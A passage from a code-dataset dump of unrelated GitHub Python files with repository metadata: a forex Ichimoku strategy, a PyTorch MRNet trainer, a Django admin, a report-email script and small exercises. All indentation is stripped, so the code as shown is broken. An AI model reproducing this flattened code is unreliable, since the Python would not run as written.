curr_peak = graph.close(i)
peak_index = i
self.graph = graph
for i in range(i, len(graph.ask_candles)):
if (graph.close(i) - curr_peak) * direction > 0:
curr_peak = graph.close(i)
peak_index = i
elif (graph.close(i) - curr_peak) / (self.peaks[-1][1] - curr_peak) > fraction:
self.peaks.append((peak_index, curr_peak))
direction *= -1
curr_peak = graph.close(i)
peak_index = i
i = len(graph.ask_candles) - 1
self.peaks.append((peak_index, curr_peak))
self.peaks.append((i, graph.close(i)))
def __call__(self, index, history_wall):
assert index < history_wall
peak_index = 0
while self.peaks[peak_index][0] < index:
peak_index += 1
right_side = min([history_wall, self.peaks[peak_index][0]])
left_side = self.peaks[peak_index - 1][0]
return (index - left_side) * (self.graph.close(right_side) - self.graph.close(left_side)) \
/ (right_side - left_side)
class IchimokuStrategy(Strategy):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.start_needed = 26
self.last_close = -1
self.max_age = 5
self.zigzag = ZigZag(0.09, self.graph)
def manage_transaction(self, index, direction, multiplier=1.0):
i = index
sl = self.sl
tran_open = self.tran_open
#times = 1
while True:
candle = self.graph.bid_candles[i]
to_sl = ((candle.low if direction == 1 else candle.high) - sl) * direction
to_tp = ((candle.low if direction == -1 else candle.high) - self.tp) * direction
"""
########################################################################
Przy wyjsciu z transakcji wypisuje:
date wyjscia, na jakim poziomie sie skonczylo i wynik
"""
if to_sl < 0:
self.last_close = i
print("Result: date-{}, end-{}, result-{}".format(self.graph.dates[i], sl, sl - tran_open))
return sl - tran_open
if to_tp > 0:
self.last_close = i
print("Result: date-{}, end-{}, result-{}".format(self.graph.dates[i], self.tp, self.tp - tran_open))
return self.tp - tran_open
"""
if candle.close > tran_open + times*(tran_open - self.sl):
if times == 1:
sl = tran_open
elif times == 4:
self.last_close = i
return times*(tran_open - self.sl)
else:
sl = self.graph.kijun_sen(i)
times += 1
"""
i += 1
def get_signal(self, index, direction):
# signal 1 kijun-tenkan cross, kumo adjusting required
signal1_present = (self.graph.tenkan_sen(index) - self.graph.kijun_sen(index)) * direction > 0 \
and (self.graph.tenkan_sen(index) - self.graph.senkou_span_A(index - 26)) * direction > 0 \
and (self.graph.tenkan_sen(index) - self.graph.senkou_span_B(index - 26)) * direction > 0
wykres1D = self.graphs[0]
index1D = wykres1D.get_my_index_for(self.graph.dates[index])
signal1_present = signal1_present and (wykres1D.close(index1D) - wykres1D.kijun_sen(index1D)) * direction > 0
signal1_age = 1
while (self.graph.tenkan_sen(index - signal1_age) - self.graph.kijun_sen(index - signal1_age)) * direction > 0:
signal1_age += 1
# signal 2 kumo cross
#signal2_present = (self.graph.senkou_span_A(index) - self.graph.senkou_span_B(index)) * direction > 0
#signal2_age = 1
#while (self.graph.senkou_span_A(index - signal2_age) - self.graph.senkou_span_B(index - signal2_age)) * direction > 0:
# signal2_age += 1
# signal 3 graph crossing kumo
signal3_present = (self.graph.close(index) - self.graph.senkou_span_A(index)) * direction > 0 \
and (self.graph.close(index) - self.graph.senkou_span_B(index)) * direction > 0
signal3_age = 1
while (self.graph.close(index - signal3_age) - self.graph.senkou_span_A(index - signal3_age)) * direction > 0 \
and (self.graph.close(index - signal3_age) - self.graph.senkou_span_B(index - signal3_age)) * direction > 0:
signal3_age += 1
signals = [(t, age) for t, pres, age in [(1, signal1_present, signal1_age),
(3, signal3_present, signal3_age)] if pres]
if signals and min(s[1] for s in signals) <= self.max_age:
return min(signals, key=lambda x: x[1])
return (0, 0)
def stoploss(self, index, signal, signal_type):
if signal_type == 1:
return self.graph.kijun_sen(index) - signal * 0.0002
if signal_type == 3:
linie = [self.graph.senkou_span_B(index), self.graph.senkou_span_A(index)]
return min(linie) if signal == 1 else max(linie)
return None
def takeprofit(self, index, signal, signal_type):
week_graph = self.graphs[1]
week_index = week_graph.get_my_index_for(self.graph.dates[index])
if signal == 1 or signal == 3:
return week_graph.najblizszy_opor(week_index)
elif signal == -1:
return week_graph.najblizsze_wsparcie(week_index)
return None
def check_for_entry(self, index):
if index <= self.last_close:
return False
direction = 1 if self.graph.tenkan_sen(index) > self.graph.tenkan_sen(index - 1) else -1
#if direction * (self.graph.close(index) - self.graph.close(index - 26)) < 0:
# return False
signal_type, age = self.get_signal(index, direction)
anti_signal, _ = self.get_signal(index, -direction)
if not signal_type or anti_signal:
return False
stoploss = self.stoploss(index, direction, signal_type)
takeprofit = self.takeprofit(index, direction, signal_type)
current = self.graph.ask_close(index)
if takeprofit is None or stoploss is None:
return False
ratio = (takeprofit - current)/(current - stoploss)
"""
########################################################################
Niezaleznie od stosunku takeprofit do stoploss wypisuje:
index, date, kierunke(1, -1), takeprofit, stoploss, obecna cene i stosunek
"""
print(index, self.graph.date(index), direction, takeprofit, stoploss, current, ratio)
if signal_type and ratio > 2.:
self.sl = stoploss
self.tp = 3 * current - 2 * stoploss
self.tran_open = current
"""#######################################################
W momencie wejscia wypisuje:
date, kierunek, takeprofit(faktyczny próbowany) i stoploss
"""
print("Enter: date-{}, direction-{}, edge-{}, sl-{}".format(
self.graph.dates[index], direction, self.tp, stoploss))
return direction
|
[
"hajtos2@gmail.com"
] |
hajtos2@gmail.com
|
fbca50ebf0262d7c137ebc41118f7bd0b71c47de
|
674649dc02390c4a60b9c62b586b81d405969047
|
/network/__init__.py
|
19f1226938b882bcbc77dc6b13f7782a531efc6f
|
[] |
no_license
|
weijiawu/Pytorch_Classification
|
709513be3e019a896ef11a1739829a97bb99c9db
|
7609a1d809590c1423f4ed0ee1f0d918954355a9
|
refs/heads/master
| 2022-12-06T00:51:26.716590
| 2020-09-01T07:38:22
| 2020-09-01T07:38:22
| 285,811,133
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,252
|
py
|
from __future__ import absolute_import
"""The models subpackage contains definitions for the following model for CIFAR10/CIFAR100
architectures:
- `AlexNet`_
- `VGG`_
- `ResNet`_
- `SqueezeNet`_
- `DenseNet`_
You can construct a model with random weights by calling its constructor:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18()
alexnet = models.alexnet()
squeezenet = models.squeezenet1_0()
densenet = models.densenet_161()
We provide pre-trained models for the ResNet variants and AlexNet, using the
PyTorch :mod:`torch.utils.model_zoo`. These can constructed by passing
``pretrained=True``:
.. code:: python
import torchvision.models as models
resnet18 = models.resnet18(pretrained=True)
alexnet = models.alexnet(pretrained=True)
ImageNet 1-crop error rates (224x224)
======================== ============= =============
Network Top-1 error Top-5 error
======================== ============= =============
ResNet-18 30.24 10.92
ResNet-34 26.70 8.58
ResNet-50 23.85 7.13
ResNet-101 22.63 6.44
ResNet-152 21.69 5.94
Inception v3 22.55 6.44
AlexNet 43.45 20.91
VGG-11 30.98 11.37
VGG-13 30.07 10.75
VGG-16 28.41 9.62
VGG-19 27.62 9.12
SqueezeNet 1.0 41.90 19.58
SqueezeNet 1.1 41.81 19.38
Densenet-121 25.35 7.83
Densenet-169 24.00 7.00
Densenet-201 22.80 6.43
Densenet-161 22.35 6.20
======================== ============= =============
.. _AlexNet: https://arxiv.org/abs/1404.5997
.. _VGG: https://arxiv.org/abs/1409.1556
.. _ResNet: https://arxiv.org/abs/1512.03385
.. _SqueezeNet: https://arxiv.org/abs/1602.07360
.. _DenseNet: https://arxiv.org/abs/1608.06993
"""
# from .alexnet import *
# from .vgg import *
# from .resnet import *
# from .resnext import *
# from .wrn import *
# from .preresnet import *
# from .densenet import *
|
[
"wwj123@zju.edu.cn"
] |
wwj123@zju.edu.cn
|
c90fa5d1e85ccb1e4f8644e66559e019c9bd42f2
|
afead29a6bad77ecb242f8ad8daf23b940597670
|
/MRNet_code/trainer/trainer_cvpr.py
|
9989f1801d25ac6bab3f332df4ec99d13527c190
|
[
"MIT"
] |
permissive
|
ShikunLi/MRNet
|
6212b79df59618fd2cf361cb9cf0f395e0124deb
|
0778f52abb19fd4ae29a5ede21c06afa37c11ba4
|
refs/heads/main
| 2023-08-27T22:38:38.463251
| 2021-11-04T14:20:42
| 2021-11-04T14:20:42
| 427,638,865
| 1
| 0
|
MIT
| 2021-11-13T10:53:05
| 2021-11-13T10:53:04
| null |
UTF-8
|
Python
| false
| false
| 18,819
|
py
|
# -*- coding: utf-8 -*-
import math
import datetime
import losses
import os
from tqdm import tqdm
from utils.dice_loss import *
import torch.nn.functional as F
import numpy as np
from skimage import io
from tensorboardX import SummaryWriter
from torch.optim import lr_scheduler
from torch.autograd import Variable
import torch
writer = SummaryWriter()
running_loss_final = 0
running_loss_sub = 0
running_final = 0
class Trainer(object):
def __init__(self, cuda, model_rgb, model_six,model_att,optimizer_rgb,optimizer_six,optimizer_att,
train_sub,val_sub,train_loader, val_loader,test_loader,test_sub,max_iter,
snapshot, outpath, sshow, step_size, gamma,log_name,val_out_path,size_average=False):
self.cuda = cuda
self.model_rgb = model_rgb
self.model_six = model_six
self.model_att = model_att
self.optim_rgb = optimizer_rgb
self.optim_six = optimizer_six
self.optim_att = optimizer_att
self.train_sub = train_sub
self.val_sub = val_sub
self.train_loader = train_loader
self.val_loader = val_loader
self.test_loader = test_loader
self.test_sub = test_sub
self.epoch = 0
self.iteration = 0
self.max_iter = max_iter
self.snapshot = snapshot
self.outpath = outpath
self.sshow = sshow
self.step_size = step_size
self.gamma = gamma
self.log_name = log_name
self.val_out_path = val_out_path
self.size_average = size_average
def train(self):
max_epoch = int(math.ceil(1. * self.max_iter / len(self.train_sub)))
if self.step_size > 0:
scheduler=lr_scheduler.StepLR(optimizer=self.optim_rgb, step_size=self.step_size, gamma=self.gamma)
for epoch in range(max_epoch):
self.epoch = epoch
with tqdm(total=len(self.train_sub), desc=f'Epoch {epoch+1}/{max_epoch}',unit='img',leave=True) as pbar:
self.train_epoch(pbar)
if self.step_size > 0:
scheduler.step()
if self.iteration >= self.max_iter:
writer.close()
break
def train_epoch(self,pbar):
self.model_rgb.train()
self.model_six.train()
self.model_att.train()
for batch_idx, data in enumerate(self.train_loader):
imgs = data['image']
imgs_o = data['image_ori']
target = data['mask']
iteration = batch_idx + self.epoch * len(self.train_loader)
if self.iteration != 0 and (iteration - 1) != self.iteration:
continue # for resuming
self.iteration = iteration
if self.iteration >= self.max_iter:
break
if self.cuda:
imgs_o, imgs= imgs_o.cuda(), imgs.cuda()
target = [x.cuda() for x in target]
imgs_o = Variable(imgs_o) # [Batch_size, C, H, W] or [B, 3, 256, 256]
imgs = Variable(imgs).to(dtype=torch.float32) # [Batch_size, C, H, W] or [B, 3, 256, 256]
target = [Variable(x) for x in target] # [a1,a2,...,a6], a1=[Batch_size,C,H,W] or [b, 2, 256, 256]
n, c, h, w = imgs.size()
global running_loss_final
global running_loss_sub
global running_final
criterion = losses.init_loss('BCE_logit').cuda()
criterion_c = losses.init_loss('ContrastiveLoss').cuda()
""""""""""" ~~~Your Framework~~~ """""""""
n_rater = torch.randint(1,7,(n,))
cond_m = torch.tensor([0]).expand(n, 6).to(dtype=torch.float32)
for i in range(n):
cond_m[i, n_rater[i] - 1] = 1.0
cond_p = torch.randint(1,11,(n,6),dtype=torch.float32)
cond_ave = torch.tensor([[1/6]]).expand(n,6).to(dtype=torch.float32)
if self.cuda:
cond_m = cond_m.cuda()
cond_p = cond_p.cuda()
cond_ave = cond_ave.cuda()
for i in range(0,n):
cond_p[i,:] = (cond_p[i,:] / torch.sum(cond_p[i,:])).to(dtype=torch.float32)
'''final mask'''
# original six rater masks
f_mask_list = []
# condition masks
final_mask_list_m = []
final_mask_list_p = []
final_mask_list_ave = []
for i, rater_i_mask in enumerate(target):
rater_i_mask = rater_i_mask.to(dtype=torch.float32)
final_mask_list_p.append(torch.mul(rater_i_mask, cond_p[:,i].unsqueeze(-1).
unsqueeze(-1).unsqueeze(-1).expand(-1,2,256,256)))
final_mask_list_m.append(torch.mul(rater_i_mask, cond_m[:, i].unsqueeze(-1).
unsqueeze(-1).unsqueeze(-1).expand(-1, 2, 256, 256)))
final_mask_list_ave.append(torch.mul(rater_i_mask, 1/6))
f_mask_list.append(rater_i_mask)
final_mask_m = sum(final_mask_list_m)
final_mask_p = sum(final_mask_list_p)
final_mask_ave = sum(final_mask_list_ave)
outputs_m,f_m = self.model_rgb(imgs,cond_m)
outputs_p,f_p = self.model_rgb(imgs,cond_p)
outputs_ave,f_ave = self.model_rgb(imgs,cond_ave)
loss_m = criterion(outputs_m, final_mask_m)
loss_p = criterion(outputs_p, final_mask_p)
loss_ave = criterion(outputs_ave, final_mask_ave)
""""""""""""""""""""""""""""""""""""""""""
""""""""""" ~~~Reconstruction Net~~~ """""""""
out_m, out_p, out_ave = outputs_m.detach(), outputs_p.detach(),outputs_ave.detach()
out_six_m = self.model_six(imgs, out_m, cond_m)
out_six_p = self.model_six(imgs, out_p, cond_p)
out_six_ave = self.model_six(imgs, out_ave, cond_ave)
loss_six_m = []
loss_six_p = []
loss_six_ave = []
for i in range(6):
l_m= criterion(out_six_m[i], f_mask_list[i])
l_p = criterion(out_six_p[i], f_mask_list[i])
l_ave = criterion(out_six_ave[i], f_mask_list[i])
loss_six_m.append(l_m)
loss_six_p.append(l_p)
loss_six_ave.append(l_ave)
loss_sub_all = (sum(loss_six_m)/ 6 + sum(loss_six_p)/ 6 + sum(loss_six_ave)/ 6) /3
running_loss_sub += loss_sub_all.item()
self.optim_six.zero_grad()
loss_sub_all.backward()
self.optim_six.step()
# loss calculate
loss_six_ave_new = []
out_six_ave_new = self.model_six(imgs, out_ave, cond_ave, flag=False)
out_six_ave_mask = self.model_six(imgs, final_mask_ave, cond_ave, flag=False)
for i in range(6):
loss_i = criterion_c(out_six_ave_new[i],out_six_ave_mask[i])
loss_six_ave_new.append(loss_i)
loss_reconstruction = sum(loss_six_ave_new) / 1000
loss_all = ((3 * loss_ave + 2 * loss_p + 1 * loss_m) / 6) * 0.7 + loss_reconstruction *0.3
running_loss_final += loss_all.item()
self.optim_rgb.zero_grad()
loss_all.backward()
self.optim_rgb.step()
O_p = sum(out_six_p)
""""""""""""""""""""""""""""""""""""""""""
""""""""""" ~~~Uncertainty Soft attention~~~ """""""""
o_six_m = [x.detach() for x in out_six_m]
o_six_p = [x.detach() for x in out_six_p]
o_six_ave = [x.detach() for x in out_six_ave]
f_m, f_p, f_ave = f_m.detach(), f_p.detach(), f_ave.detach()
out_final_m,_ = self.model_att(o_six_m,f_m,out_m)
out_final_p,AttentionMap = self.model_att(o_six_p,f_p,out_p)
out_final_ave,_ = self.model_att(o_six_ave, f_ave,out_p)
loss_m_final = criterion(out_final_m, final_mask_m)
loss_p_final = criterion(out_final_p, final_mask_p)
loss_ave_final = criterion(out_final_ave, final_mask_ave)
loss_final = (3 * loss_ave_final + 2 * loss_p_final + 1 * loss_m_final) / 6
loss_final += loss_final.item()
self.optim_att.zero_grad()
loss_final.backward()
self.optim_att.step()
""""""""""""""""""""""""""""""""""""""""""
writer.add_scalar('Loss/train_main', loss_all.item(), iteration)
writer.add_scalar('Loss/train_sub', loss_sub_all.item(), iteration)
writer.add_scalar('Loss/train_final', loss_final.item(), iteration)
pbar.set_postfix(**{'loss (batch)': loss_final.item()})
""""""""""" ~~~record and report~~~ """""""""
# record
if iteration % self.sshow == (self.sshow - 1):
curr_time = str(datetime.datetime.now())[:19]
print('\n [%s,%3d,%6d, Loss: %.3f, The training loss of sub Net:%.3f, and the subnet loss is:%.3f]'%(
curr_time, self.epoch + 1, iteration + 1, running_final / (n*self.sshow),
running_loss_final / (n * self.sshow), running_loss_sub / (n * self.sshow)))
running_loss_final = 0.0
running_loss_sub = 0.0
running_final = 0.0
# report
pbar.update(n)
if iteration % (len(self.train_sub)+len(self.val_sub)) // (2 * n) == 0:
for tag, value in self.model_rgb.named_parameters():
tag = tag.replace('.', '/')
writer.add_histogram('weights/' +tag, value.data.cpu().numpy(), iteration)
writer.add_histogram('grads/' + tag, value.data.cpu().numpy(), iteration)
writer.add_scalar('learning_rate', self.optim_rgb.param_groups[0]['lr'], iteration)
out = torch.sigmoid(outputs_p)
writer.add_images('images_ori', imgs_o, iteration)
writer.add_images('images', imgs, iteration)
writer.add_images('masks/true_cup', final_mask_p[:,1,:,:].unsqueeze(1), iteration)
writer.add_images('masks/pred_cup', out[:,1,:,:].unsqueeze(1), iteration)
writer.add_images('masks/true_disc', final_mask_p[:,0,:,:].unsqueeze(1), iteration)
writer.add_images('masks/pred_disc', out[:,0,:,:].unsqueeze(1), iteration)
writer.add_images('masks/sub_pred_cup', O_p[:, 1, :, :].unsqueeze(1), iteration)
writer.add_images('masks/sub_pred_disc', O_p[:, 0, :, :].unsqueeze(1), iteration)
O_pp = torch.sigmoid(O_p)
writer.add_images('masks/sub_pred_cup_sig', O_pp[:, 1, :, :].unsqueeze(1), iteration)
writer.add_images('masks/sub_pred_disc_sig', O_pp[:, 0, :, :].unsqueeze(1), iteration)
# Attention = [Att_disc,Att_cup,uncertianty_cup,uncertianty_disc]
writer.add_images('attention/Att_disc',AttentionMap[0],iteration)
writer.add_images('attention/Att_cup', AttentionMap[1], iteration)
writer.add_images('attention/uncertianty_cup', AttentionMap[2], iteration)
writer.add_images('attention/uncertianty_disc', AttentionMap[3], iteration)
mask_cup_list = []
mask_disc_list = []
for i in range(len(f_mask_list)):
mask_disc_list.append(f_mask_list[i][:, 0, :, :].unsqueeze(1))
mask_cup_list.append(f_mask_list[i][:, 1, :, :].unsqueeze(1))
mask_cup = torch.cat(mask_cup_list, dim=1)
mask_disc = torch.cat(mask_disc_list, dim=1)
u_cup = torch.std(mask_cup, dim=1).unsqueeze(1)
u_disc = torch.std(mask_disc, dim=1).unsqueeze(1)
writer.add_images('attention/mask_u_cup', u_cup, iteration)
writer.add_images('attention/mask_u_disc', u_disc, iteration)
self.val_epoch(self.epoch,val_flag=True)
def val_epoch(self, epoch, val_flag=True):
print("Preparing for validation.")
self.model_rgb.eval()
self.model_six.eval()
self.model_att.eval()
mask_type = torch.float32
if val_flag:
n_val = len(self.val_sub) # the number of batch
data_loader = self.val_loader
# save checkpoint
savename1 = ('%s/snapshot_iter_%d.pth' % (self.outpath, epoch + 1))
torch.save(self.model_rgb.state_dict(), savename1)
savename2 = ('%s/six_snapshot_iter_%d.pth' % (self.outpath, epoch + 1))
torch.save(self.model_six.state_dict(), savename2)
savename3 = ('%s/att_snapshot_iter_%d.pth' % (self.outpath, epoch + 1))
torch.save(self.model_att.state_dict(), savename3)
print('save: (snapshot: %d)' % (epoch + 1))
else:
n_val = len(self.test_sub)
data_loader = self.test_loader
with tqdm(total=n_val, desc=f'Model test:', leave=True) as pbar:
iou_d = 0
iou_c = 0
tot = 0
bn = 0
disc_dice = 0
cup_dice = 0
disc_hard_dice = 0
cup_hard_dice = 0
n_all = n_val * 5 ## 5 is threhold
for batch_idx, data in enumerate(data_loader):
imgs, target, Name = data['image'],data['mask'],data['name']
if self.cuda:
imgs = imgs.cuda()
target = [x.cuda() for x in target]
imgs = Variable(imgs).to(dtype=mask_type)
target = [Variable(x) for x in target]
b_size = imgs.size(0)
with torch.no_grad():
condition = torch.tensor([[1/6]]).expand(b_size,6).to(dtype=torch.float32) # Default Majority
# condition = torch.randint(1, 11, (b_size, 6), dtype=torch.float32)
if self.cuda:
condition = condition.cuda()
for i in range(0, b_size):
condition[i, :] = (condition[i, :] / torch.sum(condition[i, :])).to(dtype=torch.float32)
'''final mask'''
final_mask_list = []
for i, rater_i_mask in enumerate(target):
rater_i_mask = rater_i_mask.to(dtype=torch.float32)
final_mask_list.append(torch.mul(rater_i_mask, condition[:, i].unsqueeze(-1).
unsqueeze(-1).unsqueeze(-1).expand(-1, 2, 256, 256)))
final_mask = sum(final_mask_list)
'''inference'''
coarse_pred,fea = self.model_rgb(imgs,condition)
six_rater = self.model_six(imgs, coarse_pred,condition)
mask_pred, _ = self.model_att(six_rater, fea, coarse_pred)
tot += F.binary_cross_entropy_with_logits(mask_pred, final_mask).item()
pred = torch.sigmoid(mask_pred)
# hard disc/cup dice
a_mask = (final_mask > 0.5).float()
a_pred = (pred > 0.5).float()
disc_hard_dice += dice_coeff(a_pred[:, 0, :, :], a_mask[:, 0, :, :]).item()
cup_hard_dice += dice_coeff(a_pred[:, 1, :, :], a_mask[:, 1, :, :]).item()
# soft dice : for threshold in [0.5]:
for threshold in [0.1,0.3,0.5,0.7,0.9]:
final_mask_temp = (final_mask >= threshold).float()
pred_t = (pred >= threshold).float()
pred_t_n = pred_t.cpu()
disc_pred = pred_t_n[:,0,:,:].numpy()
cup_pred = pred_t_n[:,1,:,:].numpy()
disc_pred = disc_pred.astype('int32')
cup_pred = cup_pred.astype('int32')
disc_mask = final_mask_temp[:,0,:,:].squeeze().cpu().numpy().astype('int32')
cup_mask = final_mask_temp[:, 1, :, :].squeeze().cpu().numpy().astype('int32')
'''iou for numpy'''
iou_d += iou(disc_pred,disc_mask)
iou_c += iou(cup_pred,cup_mask)
'''dice for torch'''
disc_dice += dice_coeff(pred_t[:,0,:,:], final_mask_temp[:,0,:,:]).item()
cup_dice += dice_coeff(pred_t[:,1,:,:], final_mask_temp[:,1,:,:]).item()
Name_a = Name[0]
'''Save Figure'''
num = pred.shape[0]
for i in range(0, num):
cup_image_np = cup_pred[i, :, :]
disc_image_np = disc_pred[i, :, :]
disc_path = './Out/results/{0}/'.format(Name_a.split('_')[0])
if not os.path.exists(disc_path):
os.makedirs(disc_path)
io.imsave(disc_path + 'task01.png', np.uint8(disc_image_np * 255))
cup_path = './Out/results/{0}/'.format(Name_a.split('_')[0])
io.imsave(cup_path + 'task02.png', np.uint8(cup_image_np * 255))
bn +=1
pbar.update(1)
val_score, disc_iou, cup_iou, d_dice, c_dice = tot / n_val, iou_d / n_all, \
iou_c / n_all, disc_dice / n_all, cup_dice / n_all
cup_hard_dice, disc_hard_dice = cup_hard_dice / n_val, disc_hard_dice / n_val
print('Epoch:', epoch)
if self.model_rgb.num_classes > 1:
print('Validation average cross entropy: {}'.format(val_score))
print('Validation average disc iou: {}'.format(disc_iou))
print('Validation average cup iou: {}'.format(cup_iou))
print('Validation average disc dice: {}'.format(d_dice))
print('Validation average cup dice: {}'.format(c_dice))
print('Validation hard_0.5 disc dice: {}'.format(disc_hard_dice))
print('Validation hard_0.5 cup dice: {}'.format(cup_hard_dice))
if val_flag:
writer.add_scalar('Loss_ave/test', val_score, epoch)
writer.add_scalar('Val/disc_soft_dice',d_dice, epoch)
writer.add_scalar('Val/cup_soft_dice', c_dice, epoch)
writer.add_scalar('Val/disc_hard_dice', disc_hard_dice, epoch)
writer.add_scalar('Val/cup_hard_dice', cup_hard_dice, epoch)
print("Finshed on validation.")
|
[
"noreply@github.com"
] |
noreply@github.com
|
53c54b3bb8aa86926e8da089255feac5d79acd81
|
703f96e9e02eea9271f0600a0a43bfdc8ba68a39
|
/src/door.py
|
ca09a77dd42f6960f44ffee69564c7618222be24
|
[] |
no_license
|
den01-python-programming-exercises/exercise-4-6-door-JaimePSantos
|
783ce7f49fc377cb2ecad8e0fd25170fcfb91b65
|
2f71b62c51ea312c7d47b6c34cf42e856af5fc40
|
refs/heads/master
| 2022-12-31T17:36:55.887119
| 2020-10-23T18:23:23
| 2020-10-23T18:23:23
| 306,714,208
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 77
|
py
|
class Door:
def knock(self):
string = "Who's there?"
return string
|
[
"jaimepereirasantos123@gmail.com"
] |
jaimepereirasantos123@gmail.com
|
2253f51070af3a30cfaaadf9e925f042bb219d46
|
b1e26b026b9ba4bb15a1637bcadd1132483d641d
|
/crm/admin.py
|
f75b295b5e3ef9273d2e606d7e8dc958bbe9fc19
|
[] |
no_license
|
ISQA-3900/assignment-2---django---integrated-multi-table-app-nmogulla
|
9dba15c91f7c9c929531e85504fe83104c23217d
|
63002302522abe1390d870941984d935dbe9d70f
|
refs/heads/master
| 2023-08-21T08:36:45.375560
| 2021-10-11T02:10:21
| 2021-10-11T02:10:21
| 413,619,086
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 876
|
py
|
from django.contrib import admin
# Register your models here.
from django.contrib import admin
from .models import Customer, Product, Service
class CustomerList(admin.ModelAdmin):
list_display = ('cust_name', 'organization', 'phone_number')
list_filter = ('cust_name', 'organization')
search_fields = ('cust_name',)
ordering = ['cust_name']
class ServiceList(admin.ModelAdmin):
list_display = ('cust_name', 'service_category', 'setup_time')
list_filter = ('cust_name', 'setup_time')
search_fields = ('cust_name',)
ordering = ['cust_name']
class ProductList(admin.ModelAdmin):
list_display = ('cust_name', 'product', 'pickup_time')
list_filter = ('cust_name', 'pickup_time')
search_fields = ('cust_name',)
ordering = ['cust_name']
admin.site.register(Customer)
admin.site.register(Product)
admin.site.register(Service)
|
[
"nmogulla@unomaha.edu"
] |
nmogulla@unomaha.edu
|
52fa3bcb6d8de108f027202df9afe5a89cc91e52
|
3e6698cc434f17c0ae1a490bf8f5f05eda02a717
|
/blues/models/_model_consts.py
|
f6f87b34fcd887d67df9bcf04716fdafb6fe77a7
|
[
"MIT"
] |
permissive
|
Kageshimasu/blues
|
dc6c1406712310dd395541f8892cb00328973959
|
a808fb8da86224f2e597916b04bdbd29376af6bb
|
refs/heads/master
| 2023-02-08T16:04:58.517992
| 2020-06-27T11:59:10
| 2020-06-27T11:59:10
| 259,553,037
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 555
|
py
|
from typing import List
class _ModelConst:
NUM_CLASSES = 'num_class'
NETWORK = 'network'
STATE_DICT = 'state_dict'
OPTIMIZER = 'optimizer'
MODEL_NAME = 'model_name'
class ConstError(TypeError):
pass
def get_all_consts(self) -> List[str]:
return [self.NUM_CLASSES, self.NETWORK, self.STATE_DICT, self.OPTIMIZER, self.MODEL_NAME]
def __setattr__(self, name, value):
if name in self.__dict__:
raise self.ConstError("Can't rebind const (%s)" % name)
self.__dict__[name] = value
|
[
"kageshimasu@docomo.ne.jp"
] |
kageshimasu@docomo.ne.jp
|
52554e6778796bdb4bc189811f7e83fdaf18cf7a
|
4334a4b17dd6b4b094c7387ed70d4ad0442231e4
|
/report_email.py
|
d35d5c8a47dd179f937e017dafe66f9fc553dbb4
|
[] |
no_license
|
ymuehara/Automating-Real-World-Tasks-with-Python-Week-4
|
f3fe1506bec4cb1677a3b73ea78f8f45df9a755a
|
9de4a3c32f6a07f24779f2059c4491113f64e2f3
|
refs/heads/main
| 2022-12-29T08:33:53.148697
| 2020-10-15T02:09:54
| 2020-10-15T02:09:54
| 303,873,428
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,279
|
py
|
#!/usr/bin/env python3
# https://docs.python.org/3/library/email.examples.html
import os
from datetime import datetime
import reports
import emails
def process_data(path):
data_processed = []
files = os.listdir(path)
for file in files:
if file.endswith(".txt"):
with open(path + file, 'r') as f:
inline = f.readlines()
name = inline[0].strip()
weight = inline[1].strip()
data_processed += f"name: {name} <br/>weight: {weight}<br/><br/>"
return data_processed
if __name__ == "__main__":
path = "supplier-data/descriptions/"
current_date = datetime.now().strftime('%m %d, %Y')
title = f"Process Updated on {current_date}"
info = process_data(path)
reports.generate_report("/tmp/processed.pdf", title, info)
username = "your_lab_username"
sender = "automation@example.com"
receiver = f"{username}@example.com"
subject = "Upload Completed - Online Fruit Store"
body = "All fruits are uploaded to our website successfully. " \
"A detailed list is attached to this email."
attachment = "/tmp/processed.pdf"
message = emails.generate_email(sender, receiver, subject, body, attachment)
emails.send_email(message)
|
[
"yuriuehara@hotmail.com"
] |
yuriuehara@hotmail.com
|
55058d7c8d58c89e603d4127debeb4b8df5bd25a
|
70730512e2643833e546e68761ee6cd3d7b95e1d
|
/01-python基础/code/day03/day02_exercise/exercise03.py
|
fadfaaf9e18f4ab6a6bc3a1b8aadc81dd9936e0a
|
[] |
no_license
|
Yuchen1995-0315/review
|
7f0b0403aea2da62566642c6797a98a0485811d1
|
502859fe11686cc59d2a6d5cc77193469997fe6a
|
refs/heads/master
| 2020-08-26T23:16:33.193952
| 2019-10-24T00:30:32
| 2019-10-24T00:30:32
| 217,177,822
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 406
|
py
|
"""
(扩展)在控制台中录入一个秒,计算是几小时零几分钟零几秒钟.
"""
# 10:40
total_second = int(input("请输入总秒数:"))
second = total_second % 60
hour = total_second // 60 // 60
minute = total_second // 60 % 60
# 在字符串中插入变量:
# “...x...” “..."+变量+"...”
print(str(hour) + "小时零" + str(minute) + "分钟零" + str(second) + "秒钟")
|
[
"2456830920@qq.com"
] |
2456830920@qq.com
|
b091cfdd03c19aa61ef1f7a7e0d7a8286817af51
|
bedb42966c191869be69a96b854d701bae0bcdf4
|
/results/Adaptive-vs-Direct/linear_kl.py
|
48147a5b1e641d265d6f40867ea8e8bd32edb6f2
|
[] |
no_license
|
erlerobot/parallel-trpo
|
9a1648f5b97b32dffe9a8acbadef55d39b4e3852
|
99298a7be7b88826d95b7f3e0f7fef5e0a7d7361
|
refs/heads/master
| 2021-01-25T12:01:28.920142
| 2018-03-02T15:33:58
| 2018-03-02T15:33:58
| 123,452,667
| 0
| 0
| null | 2018-03-01T15:21:37
| 2018-03-01T15:21:37
| null |
UTF-8
|
Python
| false
| false
| 959
|
py
|
import numpy as np
import matplotlib.pyplot as plt
import json
import sys
task = "HalfCheetah-v1"
times = []
rewards = []
t = []
r = []
trials = ["Reacher-v1-linear-0.000001-0.000000","Reacher-v1-linear-0.000010-0.000000","Reacher-v1-linear-0.000100-0.000000"]
for i in xrange(len(trials)):
with open(trials[i]) as data_file:
data = json.load(data_file)
times.append([])
rewards.append([])
totaltime = 0
for e in xrange(len(data["mean_reward"])):
totaltime += data["timesteps"][e]
# totaltime += 1
if i == 0:
times[i].append(totaltime)
else:
times[i].append(totaltime)
rewards[i].append(data["mean_reward"][e])
t.append(np.array(times[i]))
r.append(np.array(rewards[i]))
